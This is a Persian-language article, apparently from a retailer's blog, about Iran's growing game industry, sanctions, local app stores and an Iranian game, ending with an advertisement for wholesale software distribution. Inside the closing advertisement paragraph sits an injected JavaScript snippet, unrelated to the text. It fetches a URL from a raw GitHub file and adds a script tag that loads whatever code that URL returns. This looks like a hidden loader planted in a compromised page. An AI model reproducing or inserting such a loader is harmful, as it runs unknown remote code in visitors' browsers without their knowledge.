صنعت بازی در ایران به طور قابل توجهی از صنعت بین المللی جدا است. گوگل پلی، اپ استور و استیم در ایران بازی نمی فروشند. اکثر ایرانی ها بازی های خود را از فروشگاه های اینترنتی مانند کافه بازار یا سایر فروشگاه هایی که در اندروید موجود است، خریداری می کنند. در واقع، پخش عمده انواع بازی و نرم افزار در تهران و سراسر کشور  بیشتر از طریق فروشگاه های اینترنتی صورت می پذیرد. بسیاری از خدماتی که بازی ‌سازان در دیگر نقاط جهان آن را بدیهی می‌دانند، از موتور یونیتی گرفته تا بانکداری شبکه‌ای جهانی در ایران به راحتی در دسترس نیستند. اکثر افرادی که در ایران در صنعت بازی و نرم افزار فعالیت می کنند، عاشق بازی هستند و در تمام این سال ها بر تمام موانع و محدودیت ها غلبه کرده اند.

افزایش تعداد گیمرها در ایران

صنعت بازی در ایران رو به رشد می باشد. بر اساس گزارش مرکز تحقیقات بازی های دیجیتال (DIREC) در حال حاضر 23 میلیون نفر از جمعیت 79 میلیونی ایران بازی های کامپیوتری انجام می دهند. 64 درصد از جمعیت ایران زیر 35 سال هستند، جمعیتی که هدف صنعت بازی قرار دارد. این نشان دهنده تعداد بسیار زیاد گیمرها و ظرفیت بسیار زیاد برای رشد بازی های کامپیوتری است.

بنیاد رایانه و بازی های ویدیویی ایران گزارش می دهد که 61 میلیون ایرانی در اینترنت می باشند و 28 میلیون نفر گوشی هوشمند دارند. در حال حاضر اکثر گیمرهای ایرانی گیمرهای موبایلی هستند. باز هم این نشان دهنده تعداد زیاد گیمر و رشد سریع صنعت بازی و نرم افزار در آینده است.

بازی های ایرانی با الهام از فرهنگ ایرانی

تمدن قدیمی و تاریخی ایران خانه بسیاری از مردمان، زبان ها و فرهنگ های عمیق و غنی است. ایرانی‌ها هزاران یا شاید میلیون‌ها ایده برای ساخت بازی بر اساس این فرهنگ‌ها و خرده فرهنگ‌ها دارند. یکی از بازی هایی که بر اساس فرهنگ ایرانی ساخته شده است، بازی Anu Game Studio Grandam Overdrive است.

Grandam Overdrive یک بازی دوبعدی به سبک بازی های غربی مانند Rayman Legends است، اما با الهام از فرهنگ ایرانی می باشد. قهرمان داستان یک مادر بزرگ است. داستان در مورد نجات کودکان ربوده شده از دست گرگ می باشد. در کنوانسیون بازی تهران، Grandam Overdrive برنده بهترین بازی رایانه شخصی شد. Anu Game Studio قصد دارد آن را در سطح بین المللی منتشر نماید.

توسعه دهندگان نرم افزار برای موفقیت به چه چیزهایی نیاز دارند؟

توسعه دهندگان بازی و نرم افزار در همه جا به ابزار و اطلاعاتی در مورد نحوه استفاده از ابزارها و دسترسی به مشتریان احتیاج دارند و برای همکاری فرامرزی نیاز به اینترنت قابل اعتماد و بانکداری بین المللی دارند.

در کشورهایی که بخش‌هایی از اینترنت یا به صورت داخلی سانسور شده است و یا به صورت خارجی مسدود شده‌ می باشد، هنوز هم می‌توان با کمی هوشمندی و یک یا دو کلاینت VPN به اکثر موارد دسترسی داشت. سرعت اینترنت کندتر از قبل می باشد، ولی اتصال غیرممکن نیست. راه‌هایی برای حل مسائل بانکی نیز وجود دارد، سخت به نظر می رسد، اما ممکن است.

مشکلات پخش عمده انواع بازی و نرم افزار در تهران و سراسر کشور

توسعه دهندگان بازی و نرم افزار باید بتوانند از ابزارها برای پیشبرد کار خود استفاده نمایند و آنچه را که تولید می کنند به آسانی منتشر نمایند. تحریم‌ها مانع بزرگی بر سر راه بازی ها و نرم افزارها است. شرکت‌های مختلف تحریم‌ها را متفاوت تفسیر می‌کنند و آنها را متفاوت اجرا می‌کنند. گوگل پلی به ایرانی ها اجازه دسترسی تا زمانی که مبادله پول نداشته باشند را می دهد ، اما شرکت اپل برنامه هایی که برای ایرانیان در نظر گرفته شده بود را حذف کرد. بازار داخل ایران انبوه از بازی ها و نرم افزارها است و به سرعت در حال رشد است. هزاران توسعه دهنده با استعداد بازی و نرم افزار کار خود را شروع کرده اند و میلیون ها داستان برای ساختن بازی وجود دارد. پخش عمده انواع بازی و نرم افزار در تهران و سراسر کشور نسب به سال های گذشته روند رو به رشد داشته است.

پخش و فروش عمده نرم افزار و بازی فروشگاه خادمی

پخش خادمی با در اختیار داشتن بانک وسیعی از نرم افزار و بازی در قالب بسته های نرم افزاری و DVD به صورت آنلاین اقدام به پخش عمده انواع بسته های نرم افزاری گردو، کینگ، نوین پندار، عصر بازی و … برای همکاران و فروشگاه داران عزیز نموده است، شما عزیزان با درخواست ایجاد حساب ویژه همکاران میتوانید به بیش از 5000 هزار نرم افزار آموزشی و کاربردی و ویندوز با قیمت عمده دسترسی پیدا کنید. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *